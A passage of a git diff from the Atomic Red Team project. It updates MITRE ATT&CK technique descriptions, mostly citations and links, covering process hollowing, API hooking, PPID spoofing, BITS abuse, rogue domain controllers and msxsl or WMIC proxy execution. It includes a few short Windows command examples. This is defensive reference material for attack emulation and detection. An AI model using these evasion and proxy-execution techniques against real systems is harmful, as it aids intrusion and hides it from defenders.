Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. -Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Endgame Process Injection July 2017) +Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017) This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.
diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index 08438dee..dfb41588 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/004)
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: -* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) -* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) -* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) +* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017) +* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) +* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
## Atomic Tests diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 118bee9b..a682a7b9 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -1,10 +1,10 @@ # T1059.003 - Windows Command Shell ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/003) -
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. +
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. -Adversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.
+Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
## Atomic Tests diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index 95e0c187..b4f09402 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) -Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) +Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md index 39a10b53..ca630c36 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -1,6 +1,6 @@ # T1070.005 - Network Share Connection Removal ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/005) -
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
+
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
## Atomic Tests diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index dac80b5c..92588a46 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -1,6 +1,6 @@ # T1070 - Indicator Removal on Host ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070) -
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*. +
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index a716dae5..c2c4a3b6 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -1,6 +1,6 @@ # T1078.001 - Default Accounts ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1078/001) -
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) +
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 0f55b4f5..f9a8e3d2 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1124)
An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) -System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.
+System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) + +This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
## Atomic Tests diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 82b025c0..26dad271 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1127/001)
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) -Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
+Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
## Atomic Tests diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md index f6b93d6a..5a22a3b7 100644 --- a/atomics/T1133/T1133.md +++ b/atomics/T1133/T1133.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1133)
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. -Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
+Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. + +Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
## Atomic Tests diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 4e26c477..56fae58f 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1134/004)
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) -Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) +Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 709cdd61..4cbe849e 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. -File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.
+File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share. ## Atomic Tests diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 787f6a7f..087753e7 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -1,10 +1,14 @@ # T1176 - Browser Extensions ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1176) -
Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition) +
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) -Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. +Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. -There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control (Citation: Chrome Extension C2 Malware).
+Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) + +Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. + +There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)
## Atomic Tests diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index 4868cc10..d0b70b42 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -1,12 +1,12 @@ # T1197 - BITS Jobs ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1197) -
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. +
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. -The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin) +The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) -Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016) +Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016) -BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)
+BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
## Atomic Tests diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index 8d3ae33f..f34d481e 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -4,7 +4,7 @@ Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) -This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) +This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) ## Atomic Tests diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index 13563437..44f8b860 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/007)
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. -Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.
+Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) ## Atomic Tests diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index 18147a9c..b38e74bc 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -10,7 +10,7 @@ Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citati * msxsl.exe script[.]xsl script[.]xsl * msxsl.exe script[.]jpeg script[.]jpeg -Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1117)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) +Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic) diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index 4e59f547..607a4344 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -4,7 +4,7 @@ Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). -Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). +Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). ## Atomic Tests diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index a54cc8cb..82bfd6ff 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -4,7 +4,9 @@ Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017) -To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018) +To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018). + +In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider) ## Atomic Tests diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index 6602f8ee..b38a9f1f 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -2,7 